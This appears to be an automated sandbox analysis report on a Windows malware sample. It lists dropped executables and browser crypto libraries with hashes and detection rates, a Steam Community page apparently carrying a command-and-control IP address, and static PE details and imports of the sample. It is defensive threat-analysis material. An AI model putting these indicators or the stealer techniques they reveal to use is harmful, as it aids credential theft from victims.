Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="339813" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqls[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2459136
Entropy (8bit):	6.052474106868353
Encrypted:	false
SSDEEP:	49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
MD5:	90E744829865D57082A7F452EDC90DE5
SHA1:	833B178775F39675FA4E55EAB1032353514E1052
SHA-256:	036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
SHA-512:	0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4\|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199689717899[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3063), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	35682
Entropy (8bit):	5.380514448947195
Encrypted:	false
SSDEEP:	768:s7pqLtWYmwt5D0gqOaiNGA7PzzgiJmDzJtxvrfukPco1AUmPzzgiJmDzJtxvJ2S9:s78LtWYmwt5D0gqOac7PzzgiJmDzJtxR
MD5:	2D40025908991F0C195BCC1E39DC1FBA
SHA1:	306988C995143B78C801624DB24F1141DAAB7E7C
SHA-256:	F66EA4850A5F89AAE2B359161BC5444216F551537C118896ED934A2B44663DE3
SHA-512:	BC973FE57A1D10CD6E9F78DD9F75DA0A3CA40845788C66BFFEA703EA2D0A19615426D50C83ABD53DED7A560715A942E65D79B509BCCA63EB6B724B7F3403DC01
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: r0is https://65.109.242.59\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=english&_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=english&_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&l=english&_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.cs

C:\Users\user\AppData\Local\Temp\5358.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	2121216
Entropy (8bit):	6.847336919769676
Encrypted:	false
SSDEEP:	49152:s4K3x1vUOJtTF+TxMoxc1TU+j+dAzGwlrh:s4Ex18OtIuoITsdZ
MD5:	AC1CC39DC3DF2AB7197EC22259A09E17
SHA1:	6716724FAD0181E499477B7EF431EDE9223FDC89
SHA-256:	EA815BF1C58680496FC79B83266136DB2F37DD1FFC024E591BC7750E08DBEC08
SHA-512:	AB0AF5CB8F712DB3B7D5A281A05B60EE952F2572261B0AD74E659FE09CEC480430ECE369D7E3970C864DB91728BC760F9F4F2AF220BC6009FB87ED801AC9A771
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................P............... ....@........................... ..................@...........................`..J"...p...D......................<...................................................................................CODE................................ ..`DATA.....&... ...(..................@...BSS.....-....P.......6...................idata..J"...`...$...6..............@....tls.................Z...................rdata...............Z..............@..P.reloc..<............\..............@..P.rsrc....D...p...D..................@..P.............. ......^ .............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\A247.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	325120
Entropy (8bit):	7.384635086921583
Encrypted:	false
SSDEEP:	6144:aKhKQnUA3eyGQ8B5Cckma/ntmfbQaKLtFng7pZ40:/KQUsGQ8B5E/gUhLcdq0
MD5:	EA9DD1EAE2E521666D3F06382104EC10
SHA1:	46E89AFEB61C1D0852412480EE202D48C7D5ACEB
SHA-256:	472785C4ADDBA719D551E2C3AFD1C94AE46140331EB0A50F3EAAE2E0D6C659A9
SHA-512:	1C52E89D2918DFC05C4C31FC14602637C1A1989E7012ECA616316B12C1BC07291BBCA905E3DFDFDBE7D54DE894AC84AD28180753E92167B4038CF6F0E09D7D61
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........[7..:Y.:Y.:Y.h..:Y.h...:Y.h..:Y.B..:Y.:X..:Y.1...:Y.h..:Y.1...:Y.Rich.:Y.........................PE..L......c.....................t.......=....... ....@.................................p..........................................d...................................H................................x..@............ ..d............................text...3........................... ..`.rdata...l... ...n..................@..@.data....F...........~..............@....rsrc................L..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\kat2225.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\5358.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	881664
Entropy (8bit):	6.555251818096116
Encrypted:	false
SSDEEP:	24576:o0ESdQpglO1CxDyawn27h+9hrlgKQY9SGcZwCdTp:o0RIglO1CuL9VNcaCd9
MD5:	66064DBDB70A5EB15EBF3BF65ABA254B
SHA1:	0284FD320F99F62ACA800FB1251EFF4C31EC4ED7
SHA-256:	6A94DBDA2DD1EDCFF2331061D65E1BAF09D4861CC7BA590C5EC754F3AC96A795
SHA-512:	B05C6C09AE7372C381FBA591C3CB13A69A2451B9D38DA1A95AAC89413D7438083475D06796ACB5440CD6EC65B030C9FA6CBDAA0D2FE91A926BAE6499C360F17F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................0.............@..............................................@..............................2'...........................@..p............................0......................................................CODE....d........................... ..`DATA................................@...BSS......................................idata..2'.......(..................@....tls......... ...........................rdata.......0......................@..P.reloc..p....@......................@..P.rsrc...............................@..P.....................t..............@..P........................................................................................................................................

C:\Users\user\AppData\Roaming\rcjjrra

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	239104
Entropy (8bit):	6.7698787260601705
Encrypted:	false
SSDEEP:	3072:45pTizma5Es7ry+KlhQoHb0NlJD4/P4rmmye8QBgW8a1IIsT8:GFa5F6t0vD4/PSm8qhIsT
MD5:	EDA6E5A44657001108351760D2425C80
SHA1:	BFF6E0250B689D1431E72F8CF070D115BA4720F9
SHA-256:	7728EB47DA1CBC7E34E79DF27D3E9F47F0D5054BAF0C9BFA3BB44EBAFA9A6D6F
SHA-512:	9AF07EBAE8BFE8158F7CDEC67AC7849F3098C7B4C93FA4769FF67B40EF067221C32CC32EAF5DAA2F53F5FF14C507C065E218AD00E66460F9E3737DA29FF7F86E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*..Ko..Ko..Ko......Ko......Ko......Ko..3...Ko..Kn..Ko.5...Ko......Ko.5...Ko.Rich.Ko.........................PE..L.....wd.............................C............@..................................f.......................................i..P...................................Dj..............................P_..@...............l............................text...1........................... ..`.rdata..8r.......t..................@..@.data....2.......x...\..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\rcjjrra:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.7698787260601705
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	3.exe
File size:	239'104 bytes
MD5:	eda6e5a44657001108351760d2425c80
SHA1:	bff6e0250b689d1431e72f8cf070d115ba4720f9
SHA256:	7728eb47da1cbc7e34e79df27d3e9f47f0d5054baf0c9bfa3bb44ebafa9a6d6f
SHA512:	9af07ebae8bfe8158f7cdec67ac7849f3098c7b4c93fa4769ff67b40ef067221c32cc32eaf5daa2f53f5ff14c507c065e218ad00e66460f9e3737da29ff7f86e
SSDEEP:	3072:45pTizma5Es7ry+KlhQoHb0NlJD4/P4rmmye8QBgW8a1IIsT8:GFa5F6t0vD4/PSm8qhIsT
TLSH:	7734CF81B9E5D4B5E7A30631887489E5263AFCB6DEA58A4733883F0F38712C05B57772
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*...Ko..Ko..Ko......Ko......Ko......Ko..3...Ko..Kn..Ko.5....Ko......Ko.5....Ko.Rich.Ko.........................PE..L.....wd...

File Icon


Icon Hash:	715951216140444b

Static PE Info

General

Entrypoint:	0x4043e7
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6477D813 [Wed May 31 23:28:19 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	8744ff8cb8213e20c3a4b3f29831f2ef

Entrypoint Preview

Instruction
call 00007FBC294932D7h
jmp 00007FBC2948E6D4h
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov esi, ecx
and dword ptr [esi+04h], 00000000h
mov dword ptr [esi], 00411260h
mov byte ptr [esi+08h], 00000000h
push dword ptr [eax]
call 00007FBC2948E8FDh
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov dword ptr [ecx], 00411260h
mov eax, dword ptr [eax]
mov dword ptr [ecx+04h], eax
mov eax, ecx
mov byte ptr [ecx+08h], 00000000h
pop ebp
retn 0008h
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
and dword ptr [esi+04h], 00000000h
mov dword ptr [esi], 00411260h
mov byte ptr [esi+08h], 00000000h
call 00007FBC2948E867h
mov eax, esi
pop esi
pop ebp
retn 0004h
mov dword ptr [ecx], 00411260h
jmp 00007FBC2948E8EBh
push ebp
mov ebp, esp
push esi
push edi
mov edi, dword ptr [ebp+08h]
mov esi, ecx
cmp esi, edi
je 00007FBC2948E86Fh
call 00007FBC2948E8D8h
cmp byte ptr [edi+08h], 00000000h
je 00007FBC2948E85Eh
push dword ptr [edi+04h]
mov ecx, esi
call 00007FBC2948E88Ah
jmp 00007FBC2948E858h
mov eax, dword ptr [edi+04h]
mov dword ptr [esi+04h], eax
pop edi
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
push esi
mov esi, ecx
mov dword ptr [esi], 00411260h
call 00007FBC2948E8A7h
test byte ptr [ebp+08h], 00000001h
je 00007FBC2948E859h
push esi
call 00007FBC2948CAFBh

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[IMP] VS2008 SP1 build 30729
[C++] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x169f4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x288c000	0xd180	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x16a44	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x15f50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x10000	0x16c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xe331	0xe400	cac32e46c9fb6793dc1da9bfe5eee526	False	0.6025390625	data	6.736851528130936	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x10000	0x7238	0x7400	e7b0e384b9bdb4df63e8435baf22c83a	False	0.3808257004310345	data	4.834687412645371	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x18000	0x28732e0	0x17800	8474160c7bdee5f78a3b58296a058766	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x288c000	0xd180	0xd200	1dcb8b9d85ca51a662aab9dc90f814c9	False	0.344921875	data	4.557530326106994	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
AFX_DIALOG_LAYOUT	0x28925a0	0x2	data			5.0
RT_CURSOR	0x28925a8	0x330	Device independent bitmap graphic, 48 x 96 x 1, image size 0			0.1948529411764706
RT_CURSOR	0x28928d8	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.33223684210526316
RT_CURSOR	0x2892a30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.2953091684434968
RT_CURSOR	0x28938d8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.46705776173285196
RT_CURSOR	0x2894180	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5361271676300579
RT_CURSOR	0x2894718	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.4375
RT_CURSOR	0x2894848	0xb0	Device independent bitmap graphic, 16 x 32 x 1, image size 0			0.44886363636363635
RT_CURSOR	0x2894920	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.27238805970149255
RT_CURSOR	0x28957c8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.375
RT_CURSOR	0x2896070	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5057803468208093
RT_CURSOR	0x2896608	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.30943496801705755
RT_CURSOR	0x28974b0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.427797833935018
RT_CURSOR	0x2897d58	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5469653179190751
RT_ICON	0x288c700	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Japanese	Japan	0.43176972281449894
RT_ICON	0x288d5a8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Japanese	Japan	0.5532490974729242
RT_ICON	0x288de50	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Japanese	Japan	0.5829493087557603
RT_ICON	0x288e518	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Japanese	Japan	0.5982658959537572
RT_ICON	0x288ea80	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Japanese	Japan	0.44439834024896263
RT_ICON	0x2891028	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Japanese	Japan	0.49437148217636023
RT_ICON	0x28920d0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Japanese	Japan	0.523936170212766
RT_DIALOG	0x2898588	0x5a	data			0.8666666666666667
RT_STRING	0x28985e8	0x42c	data	Japanese	Japan	0.4597378277153558
RT_STRING	0x2898a18	0x58c	data	Japanese	Japan	0.44577464788732396
RT_STRING	0x2898fa8	0x1d2	data	Japanese	Japan	0.5321888412017167
RT_GROUP_CURSOR	0x2892a08	0x22	data			1.0294117647058822
RT_GROUP_CURSOR	0x28946e8	0x30	data			0.9375
RT_GROUP_CURSOR	0x28948f8	0x22	data			1.0588235294117647
RT_GROUP_CURSOR	0x28965d8	0x30	data			0.9375
RT_GROUP_CURSOR	0x28982c0	0x30	data			0.9375
RT_GROUP_ICON	0x2892538	0x68	data	Japanese	Japan	0.6826923076923077
RT_VERSION	0x28982f0	0x294	OpenPGP Secret Key			0.5045454545454545

Imports

DLL	Import
KERNEL32.dll	GetProcAddress, GlobalAlloc, GetLastError, SetLastError, GetThreadContext, GetTickCount, CreateEventA, LoadLibraryA, LoadLibraryW, LoadLibraryExW, GetModuleFileNameW, GetSystemDirectoryA, GetTempPathA, CreateDirectoryW, SetFileAttributesW, GetVolumeInformationA, BuildCommDCBW, SetComputerNameExA, VerifyVersionInfoW, IsProcessInJob, SetVolumeMountPointW, GetLocaleInfoW, SetCalendarInfoW, GetNumberFormatW, GetStringTypeW, SetConsoleCursorInfo, AllocConsole, WriteConsoleW, AddConsoleAliasA, OutputDebugStringW, GetConsoleCP, FlushFileBuffers, IsBadStringPtrA, InterlockedExchange, EncodePointer, DecodePointer, ReadFile, RaiseException, RtlUnwind, GetCommandLineW, IsProcessorFeaturePresent, HeapAlloc, HeapFree, ExitProcess, GetModuleHandleExW, MultiByteToWideChar, WideCharToMultiByte, HeapSize, IsDebuggerPresent, EnterCriticalSection, LeaveCriticalSection, CloseHandle, SetFilePointerEx, GetConsoleMode, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, GetCurrentThreadId, GetProcessHeap, WriteFile, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, LCMapStringW, IsValidCodePage, GetACP, 